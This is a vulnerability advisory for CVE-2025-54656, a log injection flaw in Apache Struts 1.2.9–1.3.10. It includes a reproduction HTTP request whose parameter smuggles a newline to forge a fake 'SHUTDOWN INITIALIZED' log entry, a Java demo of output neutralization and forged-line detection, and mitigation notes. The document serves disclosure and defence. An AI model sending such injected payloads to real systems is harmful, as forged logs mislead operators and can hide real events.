CVE-2025-54656

Log Injection
Affects: Apache Struts (Struts)
Versions: >=1.2.9 <=1.3.10
Patch Available

This vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

Overview

Apache Struts is a popular open-source web application framework for developing Java EE web applications. It provides robust support for creating modern Java-based enterprise applications. 

An Improper Output Neutralization for Logs vulnerability (CVE-2025-54656) has been identified in Apache Struts. It allows attackers to inject untrusted input into log files without proper filtering, potentially misleading consumers of those logs.

Per OWASP: Applications use log files to track events for review, analysis, or debugging. If unvalidated user input is written to logs, attackers can exploit this to perform log injection—inserting fake log entries or malicious content. This can result in misleading logs (log forging) or even trigger attacks like XSS if the logs are viewed in vulnerable systems.

This issue affects multiple versions of Apache Struts.

Details

Vulnerability Info

The getLookupMapName method of the LookupDispatchAction class in Struts writes the unsanitized, user-supplied keyName directly into a log entry when the lookupMap does not contain the provided key. A malicious user can exploit this by submitting a crafted keyName parameter, resulting in forged or misleading log entries.

Steps To Reproduce

1. Set up a LookupDispatchAction, or use the examples web app from Struts 1.3.10.

2. Craft an HTTP request to demonstrate the vulnerability:

POST /examples/dispatch/lookup-submit.do HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

dispatchParam=fob.bar'%0A16-Jul-2025 16:13:57.670 CRITICAL [http-nio-8080-exec-6] org.apache.struts.actions.DispatchAction 'SHUTDOWN INITIALIZED

3. Check the logs. The newline (%0A) in the dispatchParam value causes a forged log entry to appear as if it originated from the application itself. This demonstrates how an attacker can inject misleading log entries, potentially masking real events or creating confusion during log analysis.

16-Jul-2025 16:13:56.869 SEVERE [http-nio-8080-exec-9] org.apache.struts.actions.LookupDispatchAction.getLookupMapName Action[/lookup-submit] missing resource in key method map 'fob.bar'
16-Jul-2025 16:13:57.670 CRITICAL [http-nio-8080-exec-6] org.apache.struts.actions.DispatchAction 'SHUTDOWN INITIALIZED'
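The following Java program is an added example, not Struts code or HeroDevs' patch. It reconstructs, in simplified form, the logging shape described above (untrusted keyName interpolated verbatim into the message), places a neutralizing variant beside it, and runs a heuristic check over a constructed log excerpt modelled on the sample output. The method names, the exact message wording and the "third token must be a java.util.logging level" heuristic are assumptions made for the example; the payload and log lines are the advisory's, embedded here as constructed input.

```java
import java.util.Set;

/**
 * Added example (not Struts or HeroDevs code): vulnerable vs. neutralized
 * log-message construction for the CVE-2025-54656 pattern, plus a simple
 * forged-entry heuristic for Tomcat/java.util.logging style output.
 */
public class LogNeutralizationDemo {

    /** Vulnerable shape (assumed reconstruction): keyName goes into the message as-is. */
    static String vulnerableMessage(String actionPath, String keyName) {
        return "Action[" + actionPath + "] missing resource in key method map '" + keyName + "'";
    }

    /**
     * Neutralize a value destined for a single-line log entry: CR and LF are
     * rendered as visible escapes so the value cannot start a new record, and
     * any other control character is rendered as a backslash-u escape.
     */
    static String neutralize(String value) {
        if (value == null) {
            return "null";
        }
        StringBuilder sb = new StringBuilder(value.length());
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            if (c == '\n') {
                sb.append("\\n");
            } else if (c == '\r') {
                sb.append("\\r");
            } else if (c < 0x20 || c == 0x7f) {
                sb.append(String.format("\\u%04x", (int) c));
            } else {
                sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Hardened shape: same message, but the untrusted value is neutralized first. */
    static String hardenedMessage(String actionPath, String keyName) {
        return "Action[" + actionPath + "] missing resource in key method map '" + neutralize(keyName) + "'";
    }

    // Levels that java.util.logging (used by Tomcat's JULI) actually emits. A record
    // whose level token is anything else was not written by the logger itself.
    private static final Set<String> JUL_LEVELS =
            Set.of("SEVERE", "WARNING", "INFO", "CONFIG", "FINE", "FINER", "FINEST");

    /** Heuristic (assumption): a Tomcat-style line "date time LEVEL [thread] ..." with an unknown level is suspect. */
    static boolean looksForged(String line) {
        String[] parts = line.trim().split("\\s+", 4);
        return parts.length < 4 || !JUL_LEVELS.contains(parts[2]);
    }

    public static void main(String[] args) {
        // Decoded dispatchParam value from the advisory's reproduction request (%0A -> '\n').
        String payload = "fob.bar'\n16-Jul-2025 16:13:57.670 CRITICAL [http-nio-8080-exec-6] "
                + "org.apache.struts.actions.DispatchAction 'SHUTDOWN INITIALIZED";

        System.out.println("--- vulnerable: the message spans two lines, so two records appear ---");
        System.out.println(vulnerableMessage("/lookup-submit", payload));
        System.out.println("--- hardened: one record, the injected newline stays visible ---");
        System.out.println(hardenedMessage("/lookup-submit", payload));

        // Constructed log excerpt mirroring the advisory's sample output.
        String[] logLines = {
            "16-Jul-2025 16:13:56.869 SEVERE [http-nio-8080-exec-9] org.apache.struts.actions.LookupDispatchAction.getLookupMapName Action[/lookup-submit] missing resource in key method map 'fob.bar'",
            "16-Jul-2025 16:13:57.670 CRITICAL [http-nio-8080-exec-6] org.apache.struts.actions.DispatchAction 'SHUTDOWN INITIALIZED'"
        };
        System.out.println("--- heuristic scan of the log excerpt ---");
        for (String line : logLines) {
            System.out.println((looksForged(line) ? "SUSPECT " : "ok      ") + line);
        }
    }
}
```

Run with `java LogNeutralizationDemo.java` (Java 11+). The hardened output keeps the attacker's text but as a single record with a literal `\n`, which is what a log consumer needs in order to see that a newline was submitted. The level-token heuristic is deliberately narrow: it catches this particular forged line because CRITICAL is not a java.util.logging level, but an attacker who copies a genuine level would pass it, so it complements neutralization at the write site rather than replacing it.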

Mitigation

Users of the affected components should apply one of the following mitigations:

  • Upgrade to a patched release of Apache Struts 2.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Credit

  • Ryan Murphy of HeroDevs

Vulnerability Details

ID: CVE-2025-54656
Project Affected: Apache Struts
Versions Affected: >=1.2.9 <=1.3.10
Published date: August 4, 2025
Fix date (approximate): August 4, 2025
Severity: Low (CVSS assessment >=0 <4)
Category: Log Injection